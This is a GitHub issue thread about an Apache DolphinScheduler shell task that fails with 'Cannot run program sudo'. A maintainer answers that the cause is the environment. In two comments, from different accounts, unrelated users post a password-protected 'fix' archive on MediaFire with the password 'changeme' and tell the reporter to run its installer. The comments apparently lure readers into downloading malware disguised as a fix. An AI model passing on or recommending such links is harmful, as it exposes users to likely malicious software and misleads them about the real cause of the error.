### ISSUE TITLE
[Bug] [Module Name] Cannot run program "sudo"

### ISSUE THREAD

**Issue by kkkzhonghaiwei** [apache/dolphinscheduler#16533]
### Search before asking

- [X] I had searched in the [issues](https://github.com/apache/dolphinscheduler/issues?q=is%3Aissue) and found no similar issues.

### What happened

I run shell task with DS failed. But I can run it in the bash command. 
The directory actually exists in the system, I tried to run it under bash command,successfully.But failed to run in DolphinScheduler.
The Version is 3.2.1
*****************************************************************
[INFO] 2024-08-28 13:46:27.686 +0800 - Executing shell command : sudo -u root -i /tmp/dolphinscheduler/exec/process/root/14561355669280/14769037579424_1/10/24/10_24.sh
[ERROR] 2024-08-28 13:46:27.689 +0800 - shell task error
java.io.IOException: Cannot run program "sudo" (in directory "/tmp/dolphinscheduler/exec/process/root/14561355669280/14769037579424_1/10/24"): error=2, No such file or directory
	at java.lang.ProcessBuilder.start(ProcessBuilder.java:1048)
	at org.apache.dolphinscheduler.plugin.task.api.shell.BaseShellInterceptor.execute(BaseShellInterceptor.java:47)
	at org.apache.dolphinscheduler.plugin.task.api.AbstractCommandExecutor.run(AbstractCommandExecutor.java:138)
	at org.apache.dolphinscheduler.plugin.task.shell.ShellTask.handle(ShellTask.java:85)
	at org.apache.dolphinscheduler.server.worker.runner.DefaultWorkerTaskExecutor.executeTask(DefaultWorkerTaskExecutor.java:54)
	at org.apache.dolphinscheduler.server.worker.runner.WorkerTaskExecutor.run(WorkerTaskExecutor.java:175)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
Caused by: java.io.IOException: error=2, No such file or directory
	at java.lang.UNIXProcess.forkAndExec(Native Method)
	at java.lang.UNIXProcess.<init>(UNIXProcess.java:247)
	at java.lang.ProcessImpl.start(ProcessImpl.java:134)
	at java.lang.ProcessBuilder.start(ProcessBuilder.java:1029)
	... 8 common frames omitted
[ERROR] 2024-08-28 13:46:27.689 +0800 - Task execute failed, due to meet an exception
org.apache.dolphinscheduler.plugin.task.api.TaskException: Execute shell task error
	at org.apache.dolphinscheduler.plugin.task.shell.ShellTask.handle(ShellTask.java:97)
	at org.apache.dolphinscheduler.server.worker.runner.DefaultWorkerTaskExecutor.executeTask(DefaultWorkerTaskExecutor.java:54)
	at org.apache.dolphinscheduler.server.worker.runner.WorkerTaskExecutor.run(WorkerTaskExecutor.java:175)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
Caused by: java.io.IOException: Cannot run program "sudo" (in directory "/tmp/dolphinscheduler/exec/process/root/14561355669280/14769037579424_1/10/24"): error=2, No such file or directory
	at java.lang.ProcessBuilder.start(ProcessBuilder.java:1048)
	at org.apache.dolphinscheduler.plugin.task.api.shell.BaseShellInterceptor.execute(BaseShellInterceptor.java:47)
	at org.apache.dolphinscheduler.plugin.task.api.AbstractCommandExecutor.run(AbstractCommandExecutor.java:138)
	at org.apache.dolphinscheduler.plugin.task.shell.ShellTask.handle(ShellTask.java:85)
	... 5 common frames omitted
Caused by: java.io.IOException: error=2, No such file or directory
	at java.lang.UNIXProcess.forkAndExec(Native Method)
	at java.lang.UNIXProcess.<init>(UNIXProcess.java:247)
	at java.lang.ProcessImpl.start(ProcessImpl.java:134)
	at java.lang.ProcessBuilder.start(ProcessBuilder.java:1029)
	... 8 common frames omitted

### What you expected to happen

It may be a bug??

### How to reproduce

Just run a very simple shell task.It's like "echo A".

### Version

3.1.x

### Are you willing to submit PR?

- [ ] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kkkzhonghaiwei** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

What's this bro?

**Comment by SbloodyS** [comment]
It's not a bug. You should check your environment since `Cannot run program "sudo" No such file or directory`

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
